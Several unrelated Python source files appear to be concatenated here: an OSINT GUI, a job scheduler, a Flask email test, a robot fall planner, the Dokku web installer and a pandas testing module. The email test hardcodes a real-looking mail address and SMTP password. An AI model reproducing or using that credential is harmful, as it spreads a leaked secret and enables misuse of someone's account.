self.label = tk.Label(labelframe_1, text='Load...')
self.label.pack(expand=True, fill='x', side="left", padx=2, pady=2)
# create data input entry widget
self.options = tk.OptionMenu(labelframe_1, self.selection, *self.db_handler.retrieve_investigation_ids(),
command=self.open_data)
self.options.pack(expand=True, fill='x', side="left", padx=2, pady=2)
self.selection.set(self.db_handler.retrieve_investigation_ids()[0])
# create save button
self.save_button = tk.Button(labelframe_1, text="Open", command=self.open_data)
self.save_button.pack(expand=False, side="left", padx=2, pady=2, anchor="e")
# create cancel button
self.cancel_button = tk.Button(labelframe_1, text="Cancel", command=self.quit_open)
self.cancel_button.pack(expand=False, side="left", padx=2, pady=2, anchor="e")
def open_data(self, value=None):
"""Retrieves investigation data from database"""
pockint.treeview.delete(*pockint.treeview.get_children())
pockint.id_tracker = {}
if value:
investigation_id = value
else:
investigation_id = self.selection.get()
try:
iid, data = self.db_handler.open_investigation(investigation_id)
for target in data:
for transform in data[target]:
pockint.treeview.insert(pockint.getID(target), "end", values=(transform[0], transform[1]))
pockint.investigation_id_tracker = iid
self.quit_open()
except Exception as e:
print("[*] Error: ", e)
self.quit_open()
def quit_open(self):
"""Quits the open window"""
self.db_handler.close_connection()
self.destroy()
class DeleteTool(tk.Toplevel):
"""Opens a window to retrieve investigation data"""
def __init__(self, master=None, *args, **kwargs):
"""Initializes Toplevel object and builds interface"""
super().__init__(master, *args, **kwargs)
# initialize variables
self.selection = tk.StringVar(self)
# initialize database
self.db_handler = Database()
# hide window in background during drawing and load, to prevent flickering and glitches during frame load
self.withdraw()
# build and draw the window
self.build()
# unhide the Toplevel window immediately after draw and load
self.after(0, self.deiconify)
def build(self):
"""Initializes and builds application widgets"""
# create input labelframe
labelframe_1 = tk.LabelFrame(self, fg='brown')
labelframe_1.pack(side="top", expand='yes', fill='both', padx=2, pady=2, anchor="n")
# create explanation label
self.label = tk.Label(labelframe_1, text='Delete...')
self.label.pack(expand=True, fill='x', side="left", padx=2, pady=2)
# create data input entry widget
self.options = tk.OptionMenu(labelframe_1, self.selection, *self.db_handler.retrieve_investigation_ids(),
command=self.delete_data)
self.options.pack(expand=True, fill='x', side="left", padx=2, pady=2)
self.selection.set(self.db_handler.retrieve_investigation_ids()[0])
# create save button
self.save_button = tk.Button(labelframe_1, text="Delete", command=self.delete_data)
self.save_button.pack(expand=False, side="left", padx=2, pady=2, anchor="e")
# create cancel button
self.cancel_button = tk.Button(labelframe_1, text="Cancel", command=self.quit)
self.cancel_button.pack(expand=False, side="left", padx=2, pady=2, anchor="e")
def delete_data(self, value=None):
"""Deletes investigation data from database"""
if value:
investigation_id = value
else:
investigation_id = self.selection.get()
try:
self.db_handler.delete_investigation(investigation_id)
self.quit()
except Exception as e:
print("[*] Error: ", e)
self.quit()
def quit(self):
"""Quits the open window"""
self.db_handler.close_connection()
self.destroy()
class ApiTool(tk.Toplevel):
"""Opens a new window providing users ability to input api keys"""
def __init__(self, master=None, *args, **kwargs):
"""Initializes Toplevel object and builds interface"""
super().__init__(master, *args, **kwargs)
self.db_handler = Database()
# hide window in background during drawing and load, to prevent flickering and glitches during frame load
self.withdraw()
# build and draw the window
self.build()
# unhide the Toplevel window immediately after draw and load
self.after(0, self.deiconify)
def build(self):
"""Initializes and builds application widgets"""
# create input labelframe
labelframe_1 = tk.LabelFrame(self, text="api key manager", fg='brown')
labelframe_1.pack(side="top", expand='yes', fill='both', padx=2, pady=2, anchor="n")
# create data mining action selection drop down
self.selector = ttk.Combobox(labelframe_1, values=self.db_handler.get_apis(), state="readonly", width=50)
self.selector.current(0)
self.selector.pack(expand=True, fill='x', side="top", padx=2, pady=2)
# create data input entry widget
self.entry = tk.Entry(labelframe_1)
self.entry.pack(expand=True, fill='x', side="top", padx=2, pady=2)
# create status label
self.status = tk.Label(self, text='hit return to store api key', font=('verdana', 6, 'normal'))
self.status.pack(anchor='se')
# gui bindings
self.selector.bind("<<ComboboxSelected>>", self.grab_api_key)
self.selector.bind("<Return>", self.grab_api_key)
self.entry.bind('<Return>', self.add_api_key)
def grab_api_key(self, event=None):
"""Returns api key of selected api"""
api = self.selector.get()
_key = self.db_handler.get_api_key(api)
self.entry.delete(0, tk.END)
self.entry.insert(0, _key)
self.status['text'] = "api key retrieved"
if not _key:
self.status['text'] = "no api key exists, create one?"
def add_api_key(self, event=None):
"""Adds api key in database"""
_key = self.entry.get()
if self.entry.get():
self.db_handler.insert_api_key(self.selector.get(), self.entry.get())
self.grab_api_key()
self.status['text'] = "api key added"
if not self.entry.get():
if self.db_handler.get_api_key(self.selector.get()):
self.db_handler.insert_api_key(self.selector.get(), self.entry.get())
self.grab_api_key()
self.status['text'] = "api key deleted"
else:
self.status['text'] = "no api key provided"
def close_window(self):
"""Closes program window and database"""
self.db_handler.close_connection()
self.destroy()
class Gui(tk.Frame):
"""Main program graphical user interface"""
def __init__(self, master=None, *args, **kwargs):
super().__init__(master, *args, **kwargs)
if sys.platform == "win32":
self.icon = load_icon()
self.multi_select = tk.BooleanVar()
self.build_menu()
self.build_interface()
self.id_tracker = dict()
self.transforms_tracker = set()
self.investigation_id_tracker = ""
def build_menu(self):
"""Initializes and builds program menu bar"""
self.top = tk.Menu(self)
# create file menu
self.file = tk.Menu(self.top, tearoff=False)
self.file.add_command(label="Load investigation...", compound=tk.LEFT, underline=0, command=self.open_investigation)
self.file.add_command(label="Save investigation...", compound=tk.LEFT, underline=0, command=self.save_investigation)
self.file.add_command(label="Delete investigation...", compound=tk.LEFT, underline=0, command=self.delete_investigation)
self.file.add_separator()
self.file.add_command(label='Exit', command=self.quit_program,
underline=0)
self.top.add_cascade(label="File", menu=self.file, underline=0)
# create edit menu
self.edit = tk.Menu(self.top, tearoff=False)
self.edit.add_command(label="Clear data", compound=tk.LEFT, underline=0, command=self.clear_investigation_data)
self.edit.add_separator()
self.edit.add_command(label='API keys', command=self.manage_apis,
compound=tk.LEFT, underline=0)
self.top.add_cascade(label='Edit', menu=self.edit, underline=0)
# create run menu
self.run = tk.Menu(self.top, tearoff=False)
self.run.add_checkbutton(label="Multi-Select", onvalue=True, offvalue=False, variable=self.multi_select, command=self.config_menu)
self.run.add_command(label='Run Transform', accelerator='Ctrl+R',
command=self.run_data_mining, compound=tk.LEFT, underline=0)
self.top.add_cascade(label='Run', menu=self.run, underline=0)
# create about menu
self.info = tk.Menu(self.top, tearoff=False)
self.info.add_command(label='About ...', command=self.view_credits,
compound=tk.LEFT, underline=0)
self.top.add_cascade(label='?', menu=self.info, underline=0)
self.run.entryconfig("Run Transform", state="disabled")
def build_interface(self):
"""Builds the gui interface"""
# create search frame
frame_1 = tk.Frame()
frame_1.pack(expand=False, fill='x', anchor="n")
# create input labelframe
labelframe_1 = tk.LabelFrame(frame_1, text="input", fg='brown')
labelframe_1.pack(side="top", expand='yes', fill='both', padx=2, pady=2, anchor="n")
# create data input entry widget
self.entry = tk.Entry(labelframe_1)
self.entry.pack(expand=True, fill='x', side="top", padx=2, pady=2)
# create data mining action selection drop down
self.selector = ttk.Combobox(labelframe_1, values=[""], state="readonly")
self.selector.pack(expand=True, fill='x', side="top", padx=2, pady=2)
# create results frame
frame_2 = tk.Frame()
frame_2.pack(expand=True, fill='both', anchor="n")
# create output labelframe
labelframe_2 = tk.LabelFrame(frame_2, text="osint", padx=2, pady=2, fg='brown')
labelframe_2.pack(side="top", expand='yes', fill='both', padx=2, pady=2)
# create results treeview and associated scrollbar
self.treeview = ttk.Treeview(labelframe_2, column=('A', 'B'),
selectmode='extended', height=5)
self.treeview.pack(expand=1, fill='both', side=tk.LEFT)
self.treeview.column("#0", width=130)
self.treeview.heading("#0", text='input')
self.treeview.column("A", width=130)
self.treeview.heading("A", text='osint')
self.treeview.column("B", width=130)
self.treeview.heading("B", text="output")
self.sbar = tk.Scrollbar(labelframe_2)
self.treeview.config(yscrollcommand=self.sbar.set)
self.sbar.config(command=self.treeview.yview)
self.sbar.pack(expand='no', fill='both', side=tk.LEFT, anchor="e")
# create status label
self.status = tk.Label(frame_2, text='ready', font=('verdana', 6, 'normal'))
self.status.pack(anchor='se')
# gui bindings
self.entry.bind('<Return>', self.validate_input)
self.entry.bind('<FocusOut>', self.validate_input)
self.selector.bind("<<ComboboxSelected>>", self.run_data_mining)
self.selector.bind("<Return>", self.run_data_mining)
self.selector.bind("<ButtonRelease-1>", self.config_menu)
self.treeview.bind('<ButtonRelease-1>', self.selectItem)
self.bind_all('<Control-r>', self.run_data_mining)
# focus on entry widget
self.entry.focus()
def config_menu(self, event=None):
"""Ensures search menu option is properly enabled and disabled"""
if self.multi_select.get():
self.run.entryconfig("Run Transform", state="disabled")
elif self.selector.get() == "":
self.run.entryconfig("Run Transform", state="disabled")
else:
self.run.entryconfig("Run Transform", state="active")
def validate_input(self, event=None):
"""Validates and sanitizes user input"""
self.validator = InputValidator()
_input = self.entry.get()
if _input:
validated_input = self.validator.validate(_input)[-1:][0]
if validated_input[0]:
self.status['text'] = validated_input[1]
self.selector['values'] = validated_input[2]
self.selector.current(0)
self.selector.focus()
self.config_menu()
else:
self.selector["values"] = [""]
self.selector.set("")
self.run.entryconfig("Run Transform", state="disabled")
self.status['text'] = "input: invalid"
elif not _input:
self.status['text'] = "ready"
self.selector["values"] = [""]
self.run.entryconfig("Run Transform", state="disabled")
self.selector.current(0)
def run_data_mining(self, event=None):
"""Performs the select OSINT data mining operation"""
self.finished = False
if self.multi_select.get():
self.transforms_tracker.add(self.selector.get())
self.status['text'] = "multi-select: [{}]".format(" - ".join([transform for transform in self.transforms_tracker]))
else:
self.status['text'] = "running..."
_input = self.entry.get().split(",")
if _input[0]:
transform = self.selector.get()
self.transforms_tracker.add(transform)
try:
t = Thread(target=self.run_transform, args=(_input, self.transforms_tracker,))
t.daemon = True
t.start()
self.check_status()
self.entry.focus()
self.status['text'] = "ready"
self.transforms_tracker.clear()
except Exception as e:
messagebox.showerror("Error", "Error message:" + str(e))
else:
self.status['text'] = "no inputs"
def run_transform(self, _input, transforms):
"""Run lisf of transforms on input data"""
transform_executed = str
try:
for i in _input:
for transform in transforms:
transform_executed = transform
data = self.validator.execute_transform(i, transform)
for item in data:
self.treeview.insert(self.getID(i), "end", values=(transform, item))
self.finished = True
except Exception as e:
self.finished = True
self.status['text'] = "transform failed"
messagebox.showerror("Error",
"Error during transform [{}] \nError message: {}".format(transform_executed, str(e)))
def check_status(self):
"""Checks if the transform thread has finished executing"""
while self.finished is False:
root.update()
def getID(self, item):
"""Grabs the ID of the queried treeview item"""
if item in self.id_tracker.keys():
return self.id_tracker[item]
else:
_id = self.treeview.insert('', "end", text=item)
self.id_tracker[item] = _id
return _id
def selectItem(self, event=None):
"""Selects item in treeview and inserts in search box"""
curItem = self.treeview.identify("item", event.x, event.y)
self.entry.delete(0, 'end')
try:
if self.treeview.item(curItem)["text"]:
self.entry.insert(0, self.treeview.item(curItem)["text"])
self.entry.insert(0, self.treeview.item(curItem)["values"][1])
except IndexError:
pass
self.validate_input()
def view_credits(self):
"""Opens a new window providing credits information"""
# launch window and configure window settings
self.win_credits = CreditsTool()
if sys.platform == "win32":
self.win_credits.title('')
else:
self.win_credits.title('Credits')
self.win_credits.geometry('+%d+%d' % (root.winfo_x() +
20, root.winfo_y() + 20))
self.win_credits.geometry("160x100")
if sys.platform == "win32":
self.win_credits.iconbitmap(self.icon)
self.win_credits.resizable(width=False, height=False)
# set focus on window
self.win_credits.grab_set()
self.win_credits.focus()
# start mainloop
self.win_credits.mainloop()
def manage_apis(self):
"""Opens a new window allowing user to manage api keys"""
# launch window and configure window settings
self.api_tool = ApiTool()
self.api_tool.title('Manage APIs')
self.api_tool.geometry('+%d+%d' % (root.winfo_x() +
20, root.winfo_y() + 20))
if sys.platform == "win32":
self.api_tool.iconbitmap(self.icon)
self.api_tool.resizable(width=False, height=False)
self.api_tool.protocol('WM_DELETE_WINDOW', self.api_tool.close_window)
# set focus on window
self.api_tool.grab_set()
self.api_tool.focus()
# start mainloop
self.api_tool.mainloop()
def grab_investigation_data(self):
""""Stores investigation data"""
data = {}
for Parent in self.treeview.get_children():
data[self.treeview.item(Parent)["text"]]=[]
for child in self.treeview.get_children(Parent):
if self.treeview.item(child)["values"] not in data[self.treeview.item(Parent)["text"]]:
data[self.treeview.item(Parent)["text"]].append(self.treeview.item(child)["values"])
return data
def save_investigation(self):
"""Saves investigation data"""
if not self.investigation_id_tracker:
self.investigation_id_tracker = datetime.datetime.now().strftime("%Y-%m-%d_%H:%M")
data = self.grab_investigation_data()
self.save = SaveTool(investigation_id=self.investigation_id_tracker, data=data)
self.save.title('Save investigation')
self.save.geometry('+%d+%d' % (root.winfo_x() +
20, root.winfo_y() + 20))
if sys.platform == "win32":
self.save.iconbitmap(self.icon)
self.save.resizable(width=False, height=False)
self.save.protocol('WM_DELETE_WINDOW', self.save.quit_save)
# set focus on window
self.save.grab_set()
self.save.focus()
# start mainloop
self.save.mainloop()
def open_investigation(self):
"""Open investigation data"""
db = Database()
investigation_ids = db.retrieve_investigation_ids()
if not investigation_ids:
messagebox.showinfo("No saved investigations", "Please save an investigation before loading data")
db.close_connection()
if investigation_ids:
# clear investigation id
self.investigation_id_tracker = ""
self.open = OpenTool()
self.open.title('Open investigation')
self.open.geometry('+%d+%d' % (root.winfo_x() +
20, root.winfo_y() + 20))
if sys.platform == "win32":
self.open.iconbitmap(self.icon)
self.open.resizable(width=False, height=False)
self.open.protocol('WM_DELETE_WINDOW', self.open.quit_open)
# set focus on window
self.open.grab_set()
self.open.focus()
# start mainloop
self.open.mainloop()
def delete_investigation(self):
"""Delete investigation data"""
self.delete = DeleteTool()
self.delete.title('Delete investigation')
self.delete.geometry('+%d+%d' % (root.winfo_x() +
20, root.winfo_y() + 20))
if sys.platform == "win32":
self.delete.iconbitmap(self.icon)
self.delete.resizable(width=False, height=False)
self.delete.protocol('WM_DELETE_WINDOW', self.delete.quit)
# set focus on window
self.delete.grab_set()
self.delete.focus()
# start mainloop
self.delete.mainloop()
def clear_investigation_data(self, event=None):
"""Clears investigation data from treeview"""
self.treeview.delete(*pockint.treeview.get_children())
self.id_tracker = {}
self.entry.delete(0, "end")
self.validate_input()
@staticmethod
def quit_program():
"""Quits main program window"""
root.destroy()
if __name__ == '__main__':
root = tk.Tk()
root.title("POCKINT v.{}".format(__version__))
pockint = Gui(root)
root.config(menu=pockint.top)
pockint.pack(expand=False)
if sys.platform == "win32":
root.iconbitmap(pockint.icon)
root.protocol('WM_DELETE_WINDOW', pockint.quit_program)
root.mainloop()
|
scheduler.py | from future import standard_library
standard_library.install_aliases()
from builtins import object
import threading
from time import time
import random
import queue
from ..common import log
class Scheduler(object):
"""
A simple scheduler which schedules the periodic or once event
"""
import sortedcontainers as sc
max_delay_time = 60
def __init__(self):
self._jobs = Scheduler.sc.SortedSet()
self._wakeup_q = queue.Queue()
self._lock = threading.Lock()
self._thr = threading.Thread(target=self._do_jobs)
self._thr.deamon = True
self._started = False
def start(self):
"""
Start the schduler which will start the internal thread for scheduling
jobs. Please do tear_down when doing cleanup
"""
if self._started:
log.logger.info("Scheduler already started.")
return
self._started = True
self._thr.start()
def tear_down(self):
"""
Stop the schduler which will stop the internal thread for scheduling
jobs.
"""
if not self._started:
log.logger.info("Scheduler already tear down.")
return
self._wakeup_q.put(True)
def _do_jobs(self):
while 1:
(sleep_time, jobs) = self.get_ready_jobs()
self._do_execution(jobs)
try:
done = self._wakeup_q.get(timeout=sleep_time)
except queue.Empty:
pass
else:
if done:
break
self._started = False
log.logger.info("Scheduler exited.")
def get_ready_jobs(self):
"""
@return: a 2 element tuple. The first element is the next ready
duration. The second element is ready jobs list
"""
now = time()
ready_jobs = []
sleep_time = 1
with self._lock:
job_set = self._jobs
total_jobs = len(job_set)
for job in job_set:
if job.get_expiration() <= now:
ready_jobs.append(job)
if ready_jobs:
del job_set[:len(ready_jobs)]
for job in ready_jobs:
if job.get_interval() != 0 and not job.stopped():
# repeated job, calculate next due time and enqueue
job.update_expiration()
job_set.add(job)
if job_set:
sleep_time = job_set[0].get_expiration() - now
if sleep_time < 0:
log.logger.warn("Scheduler satuation, sleep_time=%s",
sleep_time)
sleep_time = 0.1
if ready_jobs:
log.logger.info("Get %d ready jobs, next duration is %f, "
"and there are %s jobs scheduling",
len(ready_jobs), sleep_time, total_jobs)
ready_jobs.sort(key=lambda job: job.get("priority", 0), reverse=True)
return (sleep_time, ready_jobs)
def add_jobs(self, jobs):
with self._lock:
now = time()
job_set = self._jobs
for job in jobs:
delay_time = random.randrange(0, self.max_delay_time)
job.set_initial_due_time(now + delay_time)
job_set.add(job)
self._wakeup()
def update_jobs(self, jobs):
with self._lock:
job_set = self._jobs
for njob in jobs:
job_set.discard(njob)
job_set.add(njob)
self._wakeup()
def remove_jobs(self, jobs):
with self._lock:
job_set = self._jobs
for njob in jobs:
njob.stop()
job_set.discard(njob)
self._wakeup()
def number_of_jobs(self):
with self._lock:
return len(self._jobs)
def disable_randomization(self):
self.max_delay_time = 1
def _wakeup(self):
self._wakeup_q.put(None)
def _do_execution(self, jobs):
for job in jobs:
job()
|
test_email.py | from threading import Thread
from flask import Flask
from flask_mail import Mail,Message
app = Flask(__name__)
app.debug=True
app.config["MAIL_SERVER"] = "smtp.qq.com"
app.config["MAIL_PORT"] = 465
app.config["MAIL_USE_SSL"] = True
app.config["MAIL_USERNAME"] = "2364839934@qq.com"
app.config["MAIL_PASSWORD"] = "oycimssoihqkdhie"
mail = Mail(app)
@app.route("/send_mail")
def send_mail():
message = Message("title",sender=app.config["MAIL_USERNAME"],recipients=["2364839934@qq.com"])
message.body = "content"
t = Thread(target=_send_email,args=(message,))
t.start()
return "succ"
def _send_email(msg):
with app.app_context():
mail.send(msg)
import smtplib
from email.mime.text import MIMEText
from email.header import Header
if __name__ == "__main__":
app.run(host='0.0.0.0',port=5002)
pass
'''
sender = '2364839934@qq.com'
receiver = sender
subject = 'python email test'
smtpserver = 'smtp.qq.com'
username = sender
password = 'oycimssoihqkdhie'
msg = MIMEText( 'Hello Python', 'text', 'utf-8' )
msg['Subject'] = Header( subject, 'utf-8' )
smtp = smtplib.SMTP()
smtp.connect( smtpserver )
smtp.login( username, password )
smtp.sendmail( sender, receiver, msg.as_string() )
smtp.quit()
'''
|
rollover_planner.py | import os
import sys
import pinocchio
import crocoddyl
import numpy as np
import math
import subprocess
import threading
from humanoid import SimpleHumanoidGaitProblem, plotSolution
from visualizer import VisualModel
from simulator import HumanoidSimulator
from planner import Planner, OptimalPlanner
from simple_planner import SimpleKneePlanner
import time
import matplotlib.pyplot as plt
class RolloverPlanner(OptimalPlanner):
def __init__(self, x0, nq, nv, na, control_length, contact_index=1, timeStep=1e-3, display=False):
super(RolloverPlanner, self).__init__(x0, nq, nv, na, control_length, contact_index, timeStep, display)
def forward(self, model, handLength, timeLength):
def showGepetto():
subprocess.call(["gepetto-gui"])
if self.display:
try:
thread = threading.Thread(target=showGepetto)
thread.start()
time.sleep(1)
#thread.join()
except:
print "Error: unable to start Gepetto-GUI thread"
# Setting up contact timings
timeStep = self.timeStep
flyingKnots = self.bc_length
groundKnots = self.ac_length
# Setting up contact position
handLength = handLength
# Setting up falling problem
torso = 'base_link'
lFoot, rFoot = 'l_foot', 'r_foot'
lKneePoint, rKneePoint, rKneePoint1 = 'l_knee_lp', 'r_knee_rp', 'r_knee_lp'
lHandPoint, rHandPoint = 'l_hand_dp', 'r_hand_dp'
q0 = self.x0[:self.nq].copy()
gait = SimpleHumanoidGaitProblem(model.model, q0, torso, lFoot, rFoot,lKneePoint, rKneePoint, rKneePoint1, lHandPoint, rHandPoint)
# Setting up all tasks
problem = gait.createRolloverFallProblem(self.x0, handLength, timeLength, timeStep, groundKnots, flyingKnots, final=False)
endEffectors = [lKneePoint, rKneePoint,lHandPoint, rHandPoint]
tauTraj, velTraj = self.solve(model, problem, endEffectors)
return tauTraj, velTraj
def test():
pinocchio.switchToNumpyMatrix()
# Define simulation steps
horizon_length = 5000
time_step = 1e-3
# Define control trajectory steps
ctrl_time_step = 1e-2
# Load pinocchio model
m = VisualModel()
x0, nq, nv, na = m.x0, m.nq, m.nv, m.na
# Simple knee trajectory to initiate robot's movement
simpleKneePlanner = SimpleKneePlanner(x0, nq, nv, na, horizon_length)
kneeTraj = simpleKneePlanner.forward()
# Simulate static trajectory to obtain handLength and initial pose
s = HumanoidSimulator(horizon_length, display=False, timeStep=time_step)
s.initPose(x0, nq, nv, na)
_, _, _, _, _, x1, handLength, timeLength = s.simulate(m, kneeTraj, kneeTraj)
ctrl_horizon_length = timeLength//int(ctrl_time_step/time_step)
print('ctrl_length:%d'%ctrl_horizon_length)
# Plan optimal rollover trajectory
rolloverPlanner = RolloverPlanner(x1, nq, nv, na, ctrl_horizon_length*2, contact_index=ctrl_horizon_length, timeStep=ctrl_time_step, display=True)
tauRolloverTraj = rolloverPlanner.forward(m, handLength)
tauRolloverTraj_index = rolloverPlanner.contact_index
rolloverPlanner.saveTraj(np.matrix(tauRolloverTraj).T)
# # Simulate optimal rollover trajectory
# ss = HumanoidSimulator(horizon_length, display=True,timeStep=time_step)
# ss.initPose(x0, nq, nv, na)
# forceArr, comArr = ss.simulateOptTraj(m, kneeTraj, tauRolloverTraj,ctrlTimeStep=ctrl_time_step)
# # Plot simulated result
# ss.plot(forceArr,comArr)
if __name__ == "__main__":
test() |
dokku-installer.py | #!/usr/bin/env python2.7
import cgi
import json
import os
import re
import SimpleHTTPServer
import SocketServer
import subprocess
import sys
import threading
VERSION = 'v0.12.5'
hostname = ''
try:
command = "bash -c '[[ $(dig +short $HOSTNAME) ]] && echo $HOSTNAME || wget -q -O - icanhazip.com'"
hostname = subprocess.check_output(command, shell=True)
if ':' in hostname:
hostname = ''
except subprocess.CalledProcessError:
pass
key_file = os.getenv('KEY_FILE', '/root/.ssh/authorized_keys')
admin_keys = []
if os.path.isfile(key_file):
try:
command = "cat {0}".format(key_file)
admin_keys = subprocess.check_output(command, shell=True).strip().split("\n")
except subprocess.CalledProcessError:
pass
def check_boot():
if 'onboot' not in sys.argv:
return
init_dir = os.getenv('INIT_DIR', '/etc/init')
systemd_dir = os.getenv('SYSTEMD_DIR', '/etc/systemd/system')
nginx_dir = os.getenv('NGINX_DIR', '/etc/nginx/conf.d')
if os.path.exists(init_dir):
with open('{0}/dokku-installer.conf'.format(init_dir), 'w') as f:
f.write("start on runlevel [2345]\n")
f.write("exec {0} selfdestruct\n".format(os.path.abspath(__file__)))
if os.path.exists(systemd_dir):
with open('{0}/dokku-installer.service'.format(systemd_dir), 'w') as f:
f.write("[Unit]\n")
f.write("Description=Dokku web-installer\n")
f.write("\n")
f.write("[Service]\n")
f.write("ExecStart={0} selfdestruct\n".format(os.path.abspath(__file__)))
f.write("\n")
f.write("[Install]\n")
f.write("WantedBy=multi-user.target\n")
f.write("WantedBy=graphical.target\n")
if os.path.exists(nginx_dir):
with open('{0}/dokku-installer.conf'.format(nginx_dir), 'w') as f:
f.write("upstream dokku-installer { server 127.0.0.1:2000; }\n")
f.write("server {\n")
f.write(" listen 80;\n")
f.write(" location / {\n")
f.write(" proxy_pass http://dokku-installer;\n")
f.write(" }\n")
f.write("}\n")
subprocess.call('rm -f /etc/nginx/sites-enabled/*', shell=True)
sys.exit(0)
class GetHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
content = PAGE.replace('{VERSION}', VERSION)
content = content.replace('{HOSTNAME}', hostname)
content = content.replace('{ADMIN_KEYS}', "\n".join(admin_keys))
self.send_response(200)
self.end_headers()
self.wfile.write(content)
def do_POST(self):
if self.path not in ['/setup', '/setup/']:
return
params = cgi.FieldStorage(fp=self.rfile,
headers=self.headers,
environ={
'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': self.headers['Content-Type']})
vhost_enable = 'false'
dokku_root = os.getenv('DOKKU_ROOT', '/home/dokku')
if 'vhost' in params and params['vhost'].value == 'true':
vhost_enable = 'true'
with open('{0}/VHOST'.format(dokku_root), 'w') as f:
f.write(params['hostname'].value)
else:
try:
os.remove('{0}/VHOST'.format(dokku_root))
except OSError:
pass
with open('{0}/HOSTNAME'.format(dokku_root), 'w') as f:
f.write(params['hostname'].value)
for (index, key) in enumerate(params['keys'].value.splitlines(), 1):
user = 'admin'
if self.admin_user_exists() is not None:
user = 'web-admin'
if self.web_admin_user_exists() is not None:
index = int(self.web_admin_user_exists()) + 1
elif self.web_admin_user_exists() is None:
index = 1
elif self.admin_user_exists() is None:
pass
else:
index = int(self.admin_user_exists()) + 1
user = user + str(index)
command = ['sshcommand', 'acl-add', 'dokku', user]
proc = subprocess.Popen(command, stdin=subprocess.PIPE)
proc.stdin.write(key)
proc.stdin.close()
proc.wait()
set_debconf_selection('boolean', 'skip_key_file', 'true')
set_debconf_selection('boolean', 'vhost_enable', vhost_enable)
set_debconf_selection('boolean', 'web_config', 'false')
set_debconf_selection('string', 'hostname', params['hostname'].value)
if 'selfdestruct' in sys.argv:
DeleteInstallerThread()
self.send_response(200)
self.end_headers()
self.wfile.write(json.dumps({'status': 'ok'}))
def web_admin_user_exists(self):
return self.user_exists('web-admin(\d+)')
def admin_user_exists(self):
return self.user_exists('admin(\d+)')
def user_exists(self, name):
command = 'dokku ssh-keys:list'
pattern = re.compile(r'NAME="' + name + '"')
proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
max_num = 0
exists = False
for line in proc.stdout:
m = pattern.search(line)
if m:
# User of the form `user` or `user#` exists
exists = True
max_num = max(max_num, m.group(1))
if exists:
return max_num
else:
return None
def set_debconf_selection(debconf_type, key, value):
found = False
with open('/etc/os-release', 'r') as f:
for line in f:
if 'debian' in line:
found = True
if not found:
return
ps = subprocess.Popen(['echo', 'dokku dokku/{0} {1} {2}'.format(
key, debconf_type, value
)], stdout=subprocess.PIPE)
try:
subprocess.check_output(['debconf-set-selections'], stdin=ps.stdout)
except subprocess.CalledProcessError:
pass
ps.wait()
class DeleteInstallerThread(object):
def __init__(self, interval=1):
thread = threading.Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def run(self):
command = "rm /etc/nginx/conf.d/dokku-installer.conf && /etc/init.d/nginx stop && /etc/init.d/nginx start"
try:
subprocess.call(command, shell=True)
except:
pass
command = "rm -f /etc/init/dokku-installer.conf /etc/systemd/system/dokku-installer.service && (stop dokku-installer || systemctl stop dokku-installer.service)"
try:
subprocess.call(command, shell=True)
except:
pass
def main():
check_boot()
port = int(os.getenv('PORT', 2000))
httpd = SocketServer.TCPServer(("", port), GetHandler)
print "Listening on 0.0.0.0:{0}, CTRL+C to stop".format(port)
httpd.serve_forever()
PAGE = """
<html>
<head>
<title>Dokku Setup</title>
<link rel="stylesheet" href="//netdna.bootstrapcdn.com/bootstrap/3.0.0/css/bootstrap.min.css" />
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>
</head>
<body>
<div class="container" style="width: 640px;">
<form id="form" role="form">
<h1>Dokku Setup <small>{VERSION}</small></h1>
<div class="form-group">
<h3><small style="text-transform: uppercase;">Admin Access</small></h3>
<label for="key">Public Key</label><br />
<textarea class="form-control" name="keys" rows="7" id="key">{ADMIN_KEYS}</textarea>
</div>
<div class="form-group">
<h3><small style="text-transform: uppercase;">Hostname Configuration</small></h3>
<div class="form-group">
<label for="hostname">Hostname</label>
<input class="form-control" type="text" id="hostname" name="hostname" value="{HOSTNAME}" />
</div>
<div class="checkbox">
<label><input id="vhost" name="vhost" type="checkbox" value="true"> Use <abbr title="Nginx will be run on port 80 and backend to your apps based on hostname">virtualhost naming</abbr> for apps</label>
</div>
<p>Your app URLs will look like:</p>
<pre id="example">http://hostname:port</pre>
</div>
<button type="button" onclick="setup()" class="btn btn-primary">Finish Setup</button> <span style="padding-left: 20px;" id="result"></span>
</form>
</div>
<div id="error-output"></div>
<script>
function setup() {
if ($.trim($("#key").val()) == "") {
alert("Your admin public key cannot be blank.")
return
}
if ($.trim($("#hostname").val()) == "") {
alert("Your hostname cannot be blank.")
return
}
data = $("#form").serialize()
$("input,textarea,button").prop("disabled", true);
$.post('/setup', data)
.done(function() {
$("#result").html("Success!")
window.location.href = "http://dokku.viewdocs.io/dokku~{VERSION}/deployment/application-deployment/";
})
.fail(function(data) {
$("#result").html("Something went wrong...")
$("#error-output").html(data.responseText)
});
}
function update() {
if ($("#vhost").is(":checked") && $("#hostname").val().match(/^(\d{1,3}\.){3}\d{1,3}$/)) {
alert("In order to use virtualhost naming, the hostname must not be an IP but a valid domain name.")
$("#vhost").prop('checked', false);
}
if ($("#vhost").is(':checked')) {
$("#example").html("http://<app-name>."+$("#hostname").val())
} else {
$("#example").html("http://"+$("#hostname").val()+":<app-port>")
}
}
$("#vhost").change(update);
$("#hostname").change(update);
update();
</script>
</body>
</html>
"""
if __name__ == "__main__":
main()
|
__init__.py | from __future__ import annotations
import collections
from datetime import datetime
from decimal import Decimal
from functools import wraps
import operator
import os
import re
import string
from typing import (
TYPE_CHECKING,
Callable,
ContextManager,
Counter,
Iterable,
)
import warnings
import numpy as np
from pandas._config.localization import ( # noqa:F401
can_set_locale,
get_locales,
set_locale,
)
from pandas._typing import Dtype
from pandas.core.dtypes.common import (
is_datetime64_dtype,
is_datetime64tz_dtype,
is_float_dtype,
is_integer_dtype,
is_period_dtype,
is_sequence,
is_timedelta64_dtype,
is_unsigned_integer_dtype,
pandas_dtype,
)
import pandas as pd
from pandas import (
Categorical,
CategoricalIndex,
DataFrame,
DatetimeIndex,
Index,
IntervalIndex,
MultiIndex,
NumericIndex,
RangeIndex,
Series,
bdate_range,
)
from pandas._testing._io import ( # noqa:F401
close,
network,
round_trip_localpath,
round_trip_pathlib,
round_trip_pickle,
with_connectivity_check,
write_to_compressed,
)
from pandas._testing._random import ( # noqa:F401
randbool,
rands,
